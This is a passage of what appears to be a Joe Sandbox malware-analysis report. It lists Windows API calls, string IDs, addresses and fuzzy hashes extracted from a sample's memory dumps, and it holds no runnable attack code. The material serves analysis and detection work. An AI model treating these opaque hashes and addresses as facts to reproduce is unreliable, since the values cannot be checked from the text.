                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                                    • String ID:
                                                                                                    • API String ID: 3527656728-0
                                                                                                    • Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                                    • Instruction ID: d03b18a2b949c207061bd18b8e5d47ed8ce294e6be165222704fda36eef26a4f
                                                                                                    • Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                                    • Instruction Fuzzy Hash: 56F0CD756015009BDE00FFAAD9CBE4B3B989F043097048496B908DF187CA3CD8649B3A
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateFileHandle
                                                                                                    • String ID: !nI$.tmp$_iu
                                                                                                    • API String ID: 3498533004-584216493
                                                                                                    • Opcode ID: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                                    • Instruction ID: 7da7e9bbb2667b7856572ae533a3071efe8e017fb0344d9459fa270775feb22d
                                                                                                    • Opcode Fuzzy Hash: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                                    • Instruction Fuzzy Hash: 1831C5B0A00249ABCB11EF95D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
                                                                                                    APIs
                                                                                                      • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                    • ShowWindow.USER32(?,00000005,00000000,00497FC1,?,?,00000000), ref: 00497D92
                                                                                                      • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                      • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                                      • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                                    • String ID: .dat$.msg$IMsg$Uninstall
                                                                                                    • API String ID: 3312786188-1660910688
                                                                                                    • Opcode ID: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                                    • Instruction ID: abb28459e614be91aca1b68aa70fad33032f6e559e3bf784a216f74f74fa669e
                                                                                                    • Opcode Fuzzy Hash: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                                    • Instruction Fuzzy Hash: 89314F34A14114AFCB00EF65DD9296E7BB5EF89314F91857AF800AB395DB38BD01CB68
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
                                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                                    • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                                    • API String ID: 828529508-2866557904
                                                                                                    • Opcode ID: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                                    • Instruction ID: 7e091cf0cf0c4dae12ae48626bdfb721f4796128e550bb25d34418d77cfbcdd5
                                                                                                    • Opcode Fuzzy Hash: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                                    • Instruction Fuzzy Hash: 70F0C8D034061136E620B57F5C82F7B598C8F94759F140436B109E62C2D96CA905426E
                                                                                                    APIs
                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00458028
                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00458049
                                                                                                    • CloseHandle.KERNEL32(?,0045807C), ref: 0045806F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                                    • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                                    • API String ID: 2573145106-3235461205
                                                                                                    • Opcode ID: 0165f3f1031fc1aa6e60b3a9799ba1014783226e14f241c311df118ccfede771
                                                                                                    • Instruction ID: 2f0632834368beac7d1c7250186d6a5b4d0e74160b608b18ba1b2b0c741dc3d5
                                                                                                    • Opcode Fuzzy Hash: 0165f3f1031fc1aa6e60b3a9799ba1014783226e14f241c311df118ccfede771
                                                                                                    • Instruction Fuzzy Hash: 8101A231600204AFD710EBA98C02A5A73A8EB49B25F51407BFC10E73D3DE399E08965D
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                                    • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                                    • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                                    • API String ID: 3478007392-2498399450
                                                                                                    • Opcode ID: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                                    • Instruction ID: c922fa4e85abb1c6873f36dcd01b6443d81c66d6c3501223796626af46e79b09
                                                                                                    • Opcode Fuzzy Hash: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                                    • Instruction Fuzzy Hash: 5CE0ECB2740324EADA103B627E8AF663558E724B19F50043BF001751F1C7FD1C80CA9E
                                                                                                    APIs
                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                                    • String ID: AllowSetForegroundWindow$user32.dll
                                                                                                    • API String ID: 1782028327-3855017861
                                                                                                    • Opcode ID: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                                    • Instruction ID: d51ed2a8d8be4cb67b0f2e6afaff03014389f5b4c9f6752a27b175deb1fe6994
                                                                                                    • Opcode Fuzzy Hash: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                                    • Instruction Fuzzy Hash: D7D0C790248701B9D910B3F64D46E9F3A5D894471CB50C47BB418E61C5DA7CFD04893D
                                                                                                    APIs
                                                                                                    • BeginPaint.USER32(00000000,?), ref: 00416C52
                                                                                                    • SaveDC.GDI32(?), ref: 00416C83
                                                                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
                                                                                                    • RestoreDC.GDI32(?,?), ref: 00416D0B
                                                                                                    • EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                    • String ID:
                                                                                                    • API String ID: 3808407030-0
                                                                                                    • Opcode ID: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                                    • Instruction ID: 8164e3b37c2b38cc39b91ef4074089abf19b8963c3e0e5cbd12a4ce3d65b1abe
                                                                                                    • Opcode Fuzzy Hash: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                                    • Instruction Fuzzy Hash: A1415070A002049FCB14DBA9C585FAA77F9FF48304F1540AEE8459B362D778DD81CB58
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                                    • Instruction ID: a833d86c80f2fb81cba799e3b93fc1891ddf3ebdd98a67124a25423b7ab76754
                                                                                                    • Opcode Fuzzy Hash: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                                    • Instruction Fuzzy Hash: 563132746057809FC320EF69C984B9BB7E8AF89354F04491EF9D5C3752C638E8818F19
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
                                                                                                    • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
                                                                                                    • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
                                                                                                    • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
                                                                                                    • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                                    • Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
                                                                                                    • Opcode Fuzzy Hash: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                                    • Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
                                                                                                    • GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
                                                                                                    • GetDC.USER32(00000000), ref: 0041BC12
                                                                                                    • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
                                                                                                    • DeleteObject.GDI32(00000000), ref: 0041BC9A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 1095203571-0
                                                                                                    • Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                                    • Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
                                                                                                    • Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                                    • Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
                                                                                                    APIs
                                                                                                      • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
                                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 0047367B
                                                                                                    Strings
                                                                                                    • Setting permissions on registry key: %s\%s, xrefs: 0047362A
                                                                                                    • Failed to set permissions on registry key (%d)., xrefs: 0047368C
                                                                                                    • Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast
                                                                                                    • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                                    • API String ID: 1452528299-4018462623
                                                                                                    • Opcode ID: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                                    • Instruction ID: ad6b00cc897a6d1501f3fc6a2a631de3da5dc8c6e7b4eccdfad28332e4495c63
                                                                                                    • Opcode Fuzzy Hash: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                                    • Instruction Fuzzy Hash: A121C870A046445FCB10DFA9C8826EEBBE4DF49319F50817BE408E7392D7785E098B6D
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                    • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$AllocString
                                                                                                    • String ID:
                                                                                                    • API String ID: 262959230-0
                                                                                                    • Opcode ID: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                                    • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                                    • Opcode Fuzzy Hash: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                                    • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                                    APIs
                                                                                                    • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
                                                                                                    • RealizePalette.GDI32(00000000), ref: 00414421
                                                                                                    • SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
                                                                                                    • RealizePalette.GDI32(00000000), ref: 0041443B
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00414446
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Palette$RealizeSelect$Release
                                                                                                    • String ID:
                                                                                                    • API String ID: 2261976640-0
                                                                                                    • Opcode ID: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                                    • Instruction ID: 3cc421e061c7a323c9855e33cbe13bf4890882f9e8533d15179bd5f7679f66d2
                                                                                                    • Opcode Fuzzy Hash: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                                    • Instruction Fuzzy Hash: A2018F7520C3806AE600A63D8C85A9F6BED9FCA718F15446EF495DB282DA7AC8018765
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
                                                                                                      • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
                                                                                                      • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
                                                                                                      • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
                                                                                                    • OffsetRect.USER32(?,?,?), ref: 00424DC9
                                                                                                    • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
                                                                                                    • OffsetRect.USER32(?,?,?), ref: 00424E9D
                                                                                                      • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
                                                                                                      • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
                                                                                                      • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
                                                                                                      • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
                                                                                                    • String ID: vLB
                                                                                                    • API String ID: 1477829881-1797516613
                                                                                                    • Opcode ID: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                                    • Instruction ID: 1a85cd152e58b5c2614c87f396891e2b5808bef0cf689969089b0637ec596c27
                                                                                                    • Opcode Fuzzy Hash: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
